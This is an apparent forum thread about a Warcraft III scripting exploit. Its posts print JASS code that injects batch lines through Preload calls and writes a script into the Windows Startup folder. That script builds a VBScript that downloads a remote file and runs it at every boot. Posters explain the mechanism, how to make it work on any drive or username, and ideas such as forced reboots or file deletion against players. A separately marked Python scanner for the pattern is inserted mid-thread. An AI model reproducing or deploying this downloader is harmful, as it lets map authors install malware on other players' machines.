How to virus in Warcraft III

Laiev

Hey Listen!!
Reaction score
188
Oo, why is a hacker editing a game script?

It's better to get a new game and *pãn pãn*
 

mylemonblue

You can change this now in User CP.
Reaction score
7
The fact you bothered to retaliate with such a comment implies someone does care :p
 

D4RK_G4ND4LF

New Member
Reaction score
1
just made an account to congratulate you for this
badass bug
got a compile error (win 7 64 bit) but the myvirus.bat was created

how does it work btw?
 

Jesus4Lyf

Good Idea™
Reaction score
397
just made an account to congratulate you for this
badass bug
got a compile error (win 7 64 bit) but the myvirus.bat was created

how does it work btw?
JASS:
//..
    call PreloadGenClear() // this line and the line below start writing a JASS function to preload models
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//") // this line, and all other "Preload(...)" lines add a line to preload a "model" to that function. Instead, we add a new line and put some batch script in.
    // batch scripts ignore syntax errors, so it will ignore the jass syntax and execute the echo/start lines. I use it to write a VB script to download a file and put it in your startup. You could do anything, though.
    // ...
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat") // this ends the list, and saves it to Start > Programs > Startup, and windows automatically runs everything there. my batch script makes a vbs script with echo, and then runs it, that script then downloads the specified file here. hooray!!

There's yer explanation, and that's why WC3 should never be able to write to a file. The vulnerability is the fact that WC3 can do that, in essence. :)
The script is executed from W3 and downloads viruses from the internets.
The JASS script is executed in WC3 and makes the batch script. The batch script is executed on boot and creates the vbs script. The vbs script is executed by the batch script and downloads the file. The downloaded file runs from then on, on startup. :)
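For anyone who wants to check a map before running it, here is a small scanner for the pattern explained in the post above. It is an added example, not part of the original post and not code from any thread participant. It reads a map script as text and flags Preload arguments that inject a line break and PreloadGenEnd paths that are absolute, end in a script or executable extension, or point at a Startup folder; the extension list and the sample script are assumptions constructed for illustration.

```python
import re

TOKEN = re.compile(r'"(?:[^"\\]|\\.)*"|//.*')   # a string literal or a line comment
STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')      # one JASS string literal
CALL = re.compile(r'\b(PreloadGenEnd|Preload)\s*\(')
RISKY_EXT = (".bat", ".cmd", ".vbs", ".js", ".exe", ".com", ".scr", ".lnk", ".ps1")

def _strip_comment(line):
    # Drop a trailing // comment but keep "//" that sits inside a string literal.
    return TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", line)

def _unescape(lit):
    return re.sub(r"\\(.)", lambda m: "\n" if m.group(1) == "n" else m.group(1), lit)

def scan_jass(source):
    """Return (line_number, native, reason) for each suspicious Preload* call."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        code = _strip_comment(line)
        m = CALL.search(code)
        if not m:
            continue
        native, lits = m.group(1), STRING.findall(code[m.end():])
        text = "".join(_unescape(s) for s in lits)
        if native == "Preload":
            if "\n" in text:  # a model path never needs a line break
                findings.append((no, native, "line break injected into generated file"))
            continue
        low = text.lower()
        if re.match(r"[a-z]:|\\", low) or ".." in low:
            findings.append((no, native, "output path is absolute or leaves the game directory"))
        if low.endswith(RISKY_EXT):
            findings.append((no, native, "output file has a script or executable extension"))
        if "startup" in low:
            findings.append((no, native, "output path targets a Startup folder"))
    return findings

# Constructed sample script; the injected line only echoes a marker.
SAMPLE = r'''
function PreloadModels takes nothing returns nothing
    call Preload("units\\human\\Footman\\Footman.mdl") // normal use
    call PreloadGenEnd("preload\\models.pld")
endfunction
function Suspicious takes nothing returns nothing
    call Preload("\")\necho constructed-marker\n//")
    call PreloadGenEnd("C:\\Users\\EXAMPLE\\Start Menu\\Programs\\Startup\\example.bat")
endfunction
'''
if __name__ == "__main__":
    print(*scan_jass(SAMPLE), sep="\n")
```

A PreloadGenEnd path built from variables instead of a literal is not evaluated by this scanner and still needs a manual look.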
 

Laiev

Hey Listen!!
Reaction score
188
What happens if you hardly restart your PC when you're downloading something, Sev? :p
 

Sevion

The DIY Ninja
Reaction score
413
I'm not sure I know what you mean. What I mean is that since I hardly restart my PC, the startup programs are hardly run (started).
 

Gwafu

Active Member
Reaction score
12
So, these could be used to download anything to the player's computer? Great, could use it with .slks :3
 

cano

New Member
Reaction score
0
Do I have to have local files enabled for it to work?

Edit: The file is created if its extension is not *.bat or *.exe. For a while I was able to create bat files and for whatever reason it was after I removed this line:
JASS:
call Preload("\")\n\necho objFSO.DeleteFile \"C:\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
Which is quite ridiculous.

And while the idea of using startup is pretty nice, it's hard to believe that this fairly simple exploit is made public for the first time 8 years after release of the game. o.o

Edit 2: Turning off Avast helped. :(
 

Accname

2D-Graphics enthusiast
Reaction score
1,462
@Jesus4Lyf:
if my windows ain't installed on the hard drive C but on D it wouldn't work i guess, right?
 

cano

New Member
Reaction score
0
@Jesus4Lyf:
if my windows ain't installed on the hard drive C but on D it wouldn't work i guess, right?
You can make it work, obviously. Just change all the paths accordingly, e.g.:
JASS:
call PreloadGenEnd("D:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")

Inside the *.bat file you can use environment variables like %SystemDrive% (which returns letter of your system drive, in your case D:).

Anyway, what is the purpose of this part:
JASS:
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
Why can't you just do it for All Users?
 

Accname

2D-Graphics enthusiast
Reaction score
1,462
@Cano:
that i know myself. the point is somebody who made this map will not change the script code just especially for me shortly before i download the map. you get it?

i mean, if someone is seriously trying to spread a virus through some wc3 map and i download and start the map and my windows is on another hard drive than C the code inside wouldn't work? or not?
will it crash? will it create the folders on my other hard drive? or what will happen?

Edit:
Just tested it myself. it will create these folders on the hard drive C. however, obviously nothing will happen when rebooting.
 

DioD

New Member
Reaction score
57
it's possible to use

%systemdrive%

and

%username%

making code compatible with any windows on any HDD.

also you may create a harmful script to reboot the PC instantly (or after a random time) or remove valuable files from windows, but most players play 1-5 maps all the time, it's dangerous only if icefrog injects this into dota (or any similar map virused by its author)
 

UnknowVector

I come from the net ... My format, Vector.
Reaction score
144
It's shell access with the current user's privileges; on windows that probably means administrator. It doesn't really matter how your hard drive is set up, you're screwed.
 

cano

New Member
Reaction score
0
@Cano:
that i know myself. the point is somebody who made this map will not change the script code just especially for me shortly before i download the map. you get it?
...
Just create the *.bat files on C:,D:,E: or whatever you assume to be system directory and for all other use %systemdrive%. Now, do you get it?

And I am the only one who gets this completely nullified by antivirus?
Trying to sneak an *.exe file causes Avast to alert too. Which obviously doesn't mean that this issue shouldn't be addressed by Blizzard. The danger is WAY higher than it used to be in case of possibility of executing arbitrary code through type casting, just because it can be done by literally everyone and the possibilities are greater.
 

Accname

2D-Graphics enthusiast
Reaction score
1,462
...
Just create the *.bat files on C:,D:,E: or whatever you assume to be system directory and for all other use %systemdrive%. Now, do you get it?

And I am the only one who gets this completely nullified by antivirus?
Trying to sneak an *.exe file causes Avast to alert too. Which obviously doesn't mean that this issue shouldn't be addressed by Blizzard. The danger is WAY higher than it used to be in case of possibility of executing arbitrary code through type casting, just because it can be done by literally everyone and the possibilities are greater.

i think you don't really get what i was talking about.
if this is supposed to be a kind of "virus" then it shouldn't be my task to make it fit my computer. most probably someone else would make that virus map and try to spread it over the internet, for example to me. and since he doesn't know on which hard drive windows is installed for me he wouldn't change C to D only to hit me you know? he doesn't think, "hmmm Accname doesn't have windows on C but on D, i should change the map shortly before he downloads and plays it to kick his ass" and i most probably wouldn't try to virus my own computer either.

of course, if what DioD said works then it isn't necessary at all.
 

Laiev

Hey Listen!!
Reaction score
188
If I'm not wrong, Accname is saying that even if someone knows that he'll get the map, the creator of the map which has the virus won't change the script to fit Accname's computer; it will fit the most 'common' type of computer, windows on C: and username Default (really, no one uses this username lol)
 